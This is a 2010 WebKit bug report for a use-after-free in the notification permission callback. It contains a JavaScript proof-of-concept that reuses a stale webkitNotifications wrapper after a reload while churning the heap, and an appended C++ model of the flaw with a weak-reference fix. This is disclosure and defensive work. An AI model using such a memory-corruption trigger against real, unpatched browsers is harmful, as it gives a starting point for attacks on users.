[Webkit-unassigned] [Bug 43295] New: cross_fuzz notification memory corruption

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Sat Jul 31 03:28:00 PDT 2010


https://bugs.webkit.org/show_bug.cgi?id=43295

           Summary: cross_fuzz notification memory corruption
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: PC
        OS/Version: Windows Vista
            Status: NEW
          Severity: Major
          Priority: P1
         Component: HTML DOM
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: skylined at chromium.org
                CC: eric at webkit.org
            Blocks: 42959


This is a variation of bug 31886 (https://bugs.webkit.org/show_bug.cgi?id=31886). It was found by CrossFuzz, my port of Michal Zalewski's cross_fuzz:

<script>
  // Open a second window and keep a JS reference to its notification wrapper.
  function go() {
    var target_window = window.open("about:blank");
    var notification = target_window.webkitNotifications;
    // Reloading replaces that window's document; the old wrapper stays reachable here.
    target_window.location.reload();
    // Keep calling into the stale wrapper, churning the heap before each call.
    setInterval(function () {
      heap_corrupt();
      notification.requestPermission();
    }, 1);
  }
  // Allocate and release many objects of mixed sizes so freed blocks get reused.
  function heap_corrupt() {
    var a = [];
    for(var i = 0; i < 0x100; i++) {
      try {
        if (i < 0x10) a.push(new WebGLByteArray(Math.pow(2, i)));
        a.push(new WebGLByteArray());
      } catch (e) {}
      a.push(Array(i).join('A'));
    }
    delete a;
    try {gc()} catch(e) {}
  }
  go();
</script>

It causes the code in WebCore::V8NotificationCenter::requestPermissionCallback to reuse freed memory.
stack:          WebCore::V8NotificationCenter::requestPermissionCallback
                v8::internal::HandleApiCallHelper<...>
                v8::internal::Builtin_HandleApiCall
                v8::internal::Invoke
                v8::internal::Execution::Call
                ...
http://trac.webkit.org/browser/trunk/WebCore/bindings/v8/custom/V8NotificationCenterCustom.cpp#L87

Safari does not seem to implement WebKit notifications (yet), so I'll file a Chromium bug for this too.
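The lifetime problem the report describes, reduced to a small C++ model. This is an added illustration and not WebKit code: the types Frame, NotificationCenter, RawPointerWrapper and CheckedWrapper are invented stand-ins for the frame, the native object behind window.webkitNotifications, a binding that caches a raw pointer, and a binding that re-validates the object on every call. The actual WebKit fix is not on this page; the weak-reference check is one generic way to close this class of bug.

```cpp
#include <cassert>
#include <cstdint>
#include <memory>

// Stand-in for the native object behind window.webkitNotifications.
struct NotificationCenter {
    bool requestPermission() { return true; }   // stands in for the real request
};

// Stand-in for the owning frame/document. A reload replaces the owned object;
// the previous one is freed unless something else still holds a strong reference.
struct Frame {
    std::shared_ptr<NotificationCenter> center = std::make_shared<NotificationCenter>();
    void reload() { center = std::make_shared<NotificationCenter>(); }
};

// Shape of the bug: the wrapper caches a raw pointer when it is created and
// dereferences it on every later call, even after the owner replaced the object.
struct RawPointerWrapper {
    NotificationCenter* center;
    explicit RawPointerWrapper(const Frame& f) : center(f.center.get()) {}
    bool requestPermission() { return center->requestPermission(); }   // UAF after reload
};

// Hardened shape: hold a weak reference and re-validate on every entry.
struct CheckedWrapper {
    std::weak_ptr<NotificationCenter> center;
    explicit CheckedWrapper(const Frame& f) : center(f.center) {}
    // Returns false and touches nothing when the native object is gone.
    bool requestPermission() {
        if (auto live = center.lock())
            return live->requestPermission();
        return false;
    }
};

// The report's sequence with the checked wrapper: take the wrapper, reload, call.
bool checkedCallAfterReload() {
    Frame frame;
    CheckedWrapper wrapper(frame);
    frame.reload();
    return wrapper.requestPermission();   // false: call refused, freed memory never read
}

bool checkedCallBeforeReload() {
    Frame frame;
    CheckedWrapper wrapper(frame);
    return wrapper.requestPermission();   // true: object still alive
}

// Shows the raw pointer dangling without dereferencing it. The address is
// captured as an integer while the object is still valid; after the reload it
// no longer matches the frame's live object, so a call through the wrapper
// would be the use-after-free from the report.
bool rawPointerDanglesAfterReload() {
    Frame frame;
    RawPointerWrapper wrapper(frame);
    auto cached = reinterpret_cast<std::uintptr_t>(wrapper.center);   // taken while valid
    frame.reload();                                                    // old object freed here
    auto live = reinterpret_cast<std::uintptr_t>(frame.center.get());
    return cached != live;
}

int main() {
    assert(checkedCallBeforeReload());
    assert(!checkedCallAfterReload());
    assert(rawPointerDanglesAfterReload());
    return 0;
}
```

The point of the model is where the check lives: a binding must not trust a pointer it captured when the wrapper was created, because the JS side can keep the wrapper alive across a navigation that frees the native side. Re-resolving (or weakly referencing) the native object at the top of each callback, and bailing out when it is gone, turns the stale call into a no-op instead of a write into reused memory.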
